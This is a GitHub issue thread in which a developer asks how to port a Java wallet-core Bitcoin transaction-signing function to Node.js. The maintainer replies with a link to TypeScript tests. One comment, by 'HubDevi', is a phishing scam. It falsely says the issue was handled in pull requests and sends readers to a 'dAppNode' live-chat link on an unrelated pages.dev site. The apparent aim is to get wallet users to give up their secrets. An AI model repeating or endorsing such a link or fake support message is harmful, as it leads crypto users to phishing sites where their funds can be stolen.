### ISSUE TITLE
How can i sign a BTC transaction with wallet-core on Node.js application? (package is beta on npm)

### ISSUE THREAD

**Issue by Yasinj05** [trustwallet/wallet-core#3971]
### I have the example of the functionality that i need in Java, but i cant use it on Node.js and expressjs app.
The example that works fine(I've implemented this to Node.js until the converting amount and fee... to Big int and it works but in Signing input and after it i have some problems that i don't know how to solve them and i just need examples):

        package com.project.android.skenas.trust_wallet;
  
        import com.google.protobuf.ByteString;
        import org.json.JSONArray;
        import org.json.JSONObject;
  
        import java.math.BigDecimal;
        import java.math.BigInteger;
  
        import wallet.core.java.AnySigner;
        import wallet.core.jni.BitcoinScript;
        import wallet.core.jni.CoinType;
        import wallet.core.jni.HDWallet;
        import wallet.core.jni.PrivateKey;
        import wallet.core.jni.proto.Bitcoin;
        import wallet.core.jni.proto.Ethereum;
        import wallet.core.jni.proto.Ripple;
        import wallet.core.jni.proto.Tron;
  
        import static wallet.core.jni.CoinType.*;
  
        public static String SignBitcoin(String seed, double amount, String toWallet, String fee, String divider,boolean isMax, 
        JSONArray 
        utxos) {
        HDWallet wallet = getWallet(seed);
        String publicKey = getPublicKey(wallet, BITCOIN);
        PrivateKey privateKey = getPrivateKey(wallet, BITCOIN);

        BigDecimal amountFinal = new BigDecimal(amount);
        amountFinal = amountFinal.multiply(BigDecimal.valueOf(100000000));

        BigDecimal feeFinal = new BigDecimal(fee);
        BigDecimal dividerFinal = new BigDecimal(divider);

        Bitcoin.SigningInput.Builder input = Bitcoin.SigningInput.newBuilder();
        input.setCoinType(BITCOIN.value());
        if(!isMax) {
            input.setAmount(amountFinal.multiply(dividerFinal).longValue());
        }
        input.setByteFee(feeFinal.multiply(dividerFinal).longValue());
        input.setHashType(1);
        input.setChangeAddress(publicKey);
        input.setToAddress(toWallet);
        input.setUseMaxAmount(isMax);

        for (int i = 0; i < utxos.length(); i++) {
            input.addPrivateKey(ByteString.copyFrom(privateKey.data()));
        }

        for (int i = 0; i < utxos.length(); i++) {
            BitcoinScript redeemScript = BitcoinScript.lockScriptForAddress(publicKey, BITCOIN);
            byte[] keyHash = redeemScript.matchPayToWitnessPublicKeyHash();
            if (keyHash.length > 0) {
                String key = bytesToHex(keyHash);
                ByteString scriptByteString = ByteString.copyFrom(redeemScript.data());
                input.putScripts(key, scriptByteString);
            }
        }

        for (int index = 0; index < utxos.length(); index++) {
            try {
                JSONObject utxo = utxos.getJSONObject(index);
                String value = utxo.getString("value");
                byte[] hash = hexStringToByteArray(reverseTX(utxo.getString("tx_hash")));

                Bitcoin.OutPoint.Builder output = Bitcoin.OutPoint.newBuilder();
                output.setHash(ByteString.copyFrom(hash));
                output.setIndex(utxo.getInt("tx_output_n"));
                output.setSequence(Integer.MAX_VALUE - utxo.length() + index);
                Bitcoin.OutPoint outPoint = output.build();

                BitcoinScript redeemScript2 = BitcoinScript.lockScriptForAddress(publicKey, BITCOIN);
                ByteString scriptByteString = ByteString.copyFrom(redeemScript2.data());

                Bitcoin.UnspentTransaction.Builder unspent = Bitcoin.UnspentTransaction.newBuilder();
                unspent.setScript(scriptByteString);
                unspent.setAmount(Long.parseLong(value));
                unspent.setOutPoint(outPoint);

                Bitcoin.UnspentTransaction unspentBuild = unspent.build();
                input.addUtxo(unspentBuild);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        Bitcoin.SigningOutput signer = null;
        String raw_data_hex = null;
        try {
            signer = AnySigner.sign(input.build(), BITCOIN, Bitcoin.SigningOutput.parser());
            raw_data_hex = bytesToHex(signer.getEncoded().toByteArray());
        } catch (Exception e) {
            e.printStackTrace();
        }

        return raw_data_hex;
    }

**Comment by HubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)
Regards.

**Comment by Yasinj05** [comment]
Hi @satoshiotomakan,
I just need a TS code that has the same behavior as the following Java code with the wallet-core package.
Need some examples for how to sign a BTC transaction in a Node.js application.

**Comment by satoshiotomakan** [comment]
Hi @Yasinj05, got it, here we go:
https://github.com/trustwallet/wallet-core/blob/160a6e6275d25c0edb91823ae62c605d3d66c013/wasm/tests/Blockchain/Bitcoin.test.ts#L16-L91

Please see examples with `Proto.BitcoinV2` only as the previous `Proto.Bitcoin` protocol is deprecated

**Comment by Yasinj05** [comment]
Thanks @satoshiotomakan 
Another Question,
Do you know how I can sign the Doge and Lite Coin transaction?
Is there any examples?
